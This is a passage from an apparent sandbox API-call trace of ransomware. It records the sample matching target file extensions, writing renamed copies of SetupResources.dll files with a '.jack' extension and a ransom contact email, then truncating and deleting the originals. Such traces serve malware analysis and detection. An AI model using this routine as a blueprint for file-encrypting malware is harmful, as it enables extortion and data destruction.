(lpString=".bz2") returned 4 [0197.148] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.148] lstrlenW (lpString=".7z") returned 3 [0197.148] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.148] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.148] lstrlenW (lpString=".dbf") returned 4 [0197.148] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.148] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.148] lstrlenW (lpString=".1cd") returned 4 [0197.148] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.148] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.148] lstrlenW (lpString=".jpg") returned 4 [0197.148] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.148] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.148] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.148] lstrlenW (lpString=".doc") returned 4 [0197.148] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.148] lstrlenW (lpString=".docx") returned 5 [0197.148] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.148] lstrlenW (lpString=".pdf") returned 4 [0197.148] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.148] lstrlenW (lpString=".xls") returned 4 [0197.148] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.148] lstrlenW (lpString=".xlsx") returned 5 [0197.148] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.148] lstrlenW (lpString=".ppt") returned 4 [0197.148] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.148] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.149] lstrlenW (lpString=".zip") returned 4 [0197.149] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.149] lstrlenW (lpString=".rar") returned 4 [0197.149] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.149] lstrlenW (lpString=".bz2") returned 4 [0197.149] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.149] lstrlenW (lpString=".7z") returned 3 [0197.149] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.149] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.149] lstrlenW (lpString=".dbf") returned 4 [0197.149] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.149] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.149] lstrlenW (lpString=".1cd") returned 4 [0197.149] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.149] lstrlenW (lpString="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 45 [0197.149] lstrlenW (lpString=".jpg") returned 4 [0197.149] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.149] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.149] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.149] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.150] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=19288) returned 1 [0197.150] CloseHandle (hObject=0x3dc) returned 1 [0197.150] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 0x80 [0197.150] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.151] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.151] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.151] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.151] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0197.153] GetLastError () returned 0x0 [0197.153] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x4b58, lpOverlapped=0x0) returned 1 [0197.155] WriteFile (in: hFile=0x414, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x4b60, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x4b60, lpOverlapped=0x0) returned 1 [0197.156] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.156] WriteFile (in: hFile=0x414, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.156] SetEndOfFile (hFile=0x414) returned 1 [0197.157] CloseHandle (hObject=0x414) returned 1 [0197.158] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.158] SetEndOfFile (hFile=0x3dc) returned 1 [0197.159] CloseHandle (hObject=0x3dc) returned 1 [0197.159] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.159] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll")) returned 1 [0197.159] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.159] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.160] lstrlenW (lpString=".doc") returned 4 [0197.160] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.160] lstrlenW (lpString=".docx") returned 5 [0197.160] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.160] lstrlenW (lpString=".pdf") returned 4 [0197.160] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.160] lstrlenW (lpString=".xls") returned 4 [0197.160] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.160] lstrlenW (lpString=".xlsx") returned 5 [0197.160] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.160] lstrlenW (lpString=".ppt") returned 4 [0197.160] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.160] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.160] lstrlenW (lpString=".zip") returned 4 [0197.160] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.160] lstrlenW (lpString=".rar") returned 4 [0197.160] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.160] lstrlenW (lpString=".bz2") returned 4 [0197.160] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.160] lstrlenW (lpString=".7z") returned 3 [0197.160] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.160] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.160] lstrlenW (lpString=".dbf") returned 4 [0197.160] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.160] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.160] lstrlenW (lpString=".1cd") returned 4 [0197.160] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.160] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.160] lstrlenW (lpString=".jpg") returned 4 [0197.161] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.161] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.161] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.161] lstrlenW (lpString=".doc") returned 4 [0197.161] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.161] lstrlenW (lpString=".docx") returned 5 [0197.161] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.161] lstrlenW (lpString=".pdf") returned 4 [0197.161] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.161] lstrlenW (lpString=".xls") returned 4 [0197.161] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.161] lstrlenW (lpString=".xlsx") returned 5 [0197.161] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.161] lstrlenW (lpString=".ppt") returned 4 [0197.161] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.161] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.161] lstrlenW (lpString=".zip") returned 4 [0197.161] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.161] lstrlenW (lpString=".rar") returned 4 [0197.161] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.161] lstrlenW (lpString=".bz2") returned 4 [0197.161] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.161] lstrlenW (lpString=".7z") returned 3 [0197.161] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.161] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.161] lstrlenW (lpString=".dbf") returned 4 [0197.161] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.162] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.162] lstrlenW (lpString=".1cd") returned 4 [0197.162] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.162] lstrlenW (lpString="C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 45 [0197.162] lstrlenW (lpString=".jpg") returned 4 [0197.162] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.162] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.162] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.162] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.162] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=17752) returned 1 [0197.162] CloseHandle (hObject=0x3dc) returned 1 [0197.162] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 0x80 [0197.162] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.163] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.163] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.163] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.163] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0197.238] GetLastError () returned 0x0 [0197.238] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x4558, lpOverlapped=0x0) returned 1 [0197.263] WriteFile (in: hFile=0x418, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x4560, lpOverlapped=0x0) returned 1 [0197.265] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.265] WriteFile (in: hFile=0x418, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.265] SetEndOfFile (hFile=0x418) returned 1 [0197.265] CloseHandle (hObject=0x418) returned 1 [0197.266] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.266] SetEndOfFile (hFile=0x3dc) returned 1 [0197.268] CloseHandle (hObject=0x3dc) returned 1 [0197.268] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.268] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll")) returned 1 [0197.268] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.268] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.268] lstrlenW (lpString=".doc") returned 4 [0197.268] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.268] lstrlenW (lpString=".docx") returned 5 [0197.268] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.268] lstrlenW (lpString=".pdf") returned 4 [0197.269] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.269] lstrlenW (lpString=".xls") returned 4 [0197.269] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.269] lstrlenW (lpString=".xlsx") returned 5 [0197.269] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.269] lstrlenW (lpString=".ppt") returned 4 [0197.269] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.269] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.269] lstrlenW (lpString=".zip") returned 4 [0197.269] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.269] lstrlenW (lpString=".rar") returned 4 [0197.269] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.269] lstrlenW (lpString=".bz2") returned 4 [0197.269] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.269] lstrlenW (lpString=".7z") returned 3 [0197.269] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.269] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.269] lstrlenW (lpString=".dbf") returned 4 [0197.269] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.269] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.269] lstrlenW (lpString=".1cd") returned 4 [0197.269] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.269] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.269] lstrlenW (lpString=".jpg") returned 4 [0197.269] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.269] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.270] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.270] lstrlenW (lpString=".doc") returned 4 [0197.270] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.270] lstrlenW (lpString=".docx") returned 5 [0197.270] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.270] lstrlenW (lpString=".pdf") returned 4 [0197.270] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.270] lstrlenW (lpString=".xls") returned 4 [0197.270] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.270] lstrlenW (lpString=".xlsx") returned 5 [0197.270] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.270] lstrlenW (lpString=".ppt") returned 4 [0197.270] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.270] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.270] lstrlenW (lpString=".zip") returned 4 [0197.270] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.270] lstrlenW (lpString=".rar") returned 4 [0197.270] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.270] lstrlenW (lpString=".bz2") returned 4 [0197.270] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.270] lstrlenW (lpString=".7z") returned 3 [0197.270] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.270] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.270] lstrlenW (lpString=".dbf") returned 4 [0197.270] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.270] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.270] lstrlenW (lpString=".1cd") returned 4 [0197.270] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.270] lstrlenW (lpString="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 45 [0197.271] lstrlenW (lpString=".jpg") returned 4 [0197.271] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.271] lstrcmpiW (lpString1=".dll", lpString2=".jack") returned -1 [0197.271] lstrlenW (lpString="SetupResources.dll") returned 18 [0197.271] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.271] GetFileSizeEx (in: hFile=0x3dc, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=17752) returned 1 [0197.271] CloseHandle (hObject=0x3dc) returned 1 [0197.271] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 0x80 [0197.271] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0197.271] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0197.272] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.272] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.272] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0197.353] GetLastError () returned 0x0 [0197.353] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x4558, lpOverlapped=0x0) returned 1 [0197.373] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0x4560, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0x4560, lpOverlapped=0x0) returned 1 [0197.375] ReadFile (in: hFile=0x3dc, lpBuffer=0x4229020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0197.375] WriteFile (in: hFile=0x420, lpBuffer=0x4229020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x4229020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0197.375] SetEndOfFile (hFile=0x420) returned 1 [0197.375] CloseHandle (hObject=0x420) returned 1 [0197.376] SetFilePointerEx (in: hFile=0x3dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0197.376] SetEndOfFile (hFile=0x3dc) returned 1 [0197.377] CloseHandle (hObject=0x3dc) returned 1 [0197.377] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x80) returned 1 [0197.377] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1055\\setupresources.dll")) returned 1 [0197.378] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.378] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.378] lstrlenW (lpString=".doc") returned 4 [0197.378] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.378] lstrlenW (lpString=".docx") returned 5 [0197.378] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.378] lstrlenW (lpString=".pdf") returned 4 [0197.378] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.378] lstrlenW (lpString=".xls") returned 4 [0197.378] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.378] lstrlenW (lpString=".xlsx") returned 5 [0197.378] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.378] lstrlenW (lpString=".ppt") returned 4 [0197.378] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.378] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.378] lstrlenW (lpString=".zip") returned 4 [0197.378] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.378] lstrlenW (lpString=".rar") returned 4 [0197.378] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.378] lstrlenW (lpString=".bz2") returned 4 [0197.378] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.378] lstrlenW (lpString=".7z") returned 3 [0197.378] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.378] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.378] lstrlenW (lpString=".dbf") returned 4 [0197.378] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.379] lstrlenW (lpString=".1cd") returned 4 [0197.379] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.379] lstrlenW (lpString=".jpg") returned 4 [0197.379] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0197.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.379] lstrlenW (lpString=".doc") returned 4 [0197.379] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0197.379] lstrlenW (lpString=".docx") returned 5 [0197.379] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0197.379] lstrlenW (lpString=".pdf") returned 4 [0197.379] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0197.379] lstrlenW (lpString=".xls") returned 4 [0197.379] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0197.379] lstrlenW (lpString=".xlsx") returned 5 [0197.379] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0197.379] lstrlenW (lpString=".ppt") returned 4 [0197.379] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0197.379] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.379] lstrlenW (lpString=".zip") returned 4 [0197.379] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0197.379] lstrlenW (lpString=".rar") returned 4 [0197.379] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0197.379] lstrlenW (lpString=".bz2") returned 4 [0197.379] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0197.379] lstrlenW (lpString=".7z") returned 3 [0197.380] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0197.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.380] lstrlenW (lpString=".dbf") returned 4 [0197.380] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0197.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.380] lstrlenW (lpString=".1cd") returned 4 [0197.380] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0197.380] lstrlenW (lpString="C:\\588bce7c90097ed212\\1055\\SetupResources.dll") returned 45 [0197.380] lstrlenW (lpString=".jpg") returned 4 [0197.380] lstrcmpiW (lpString1=".jpg", 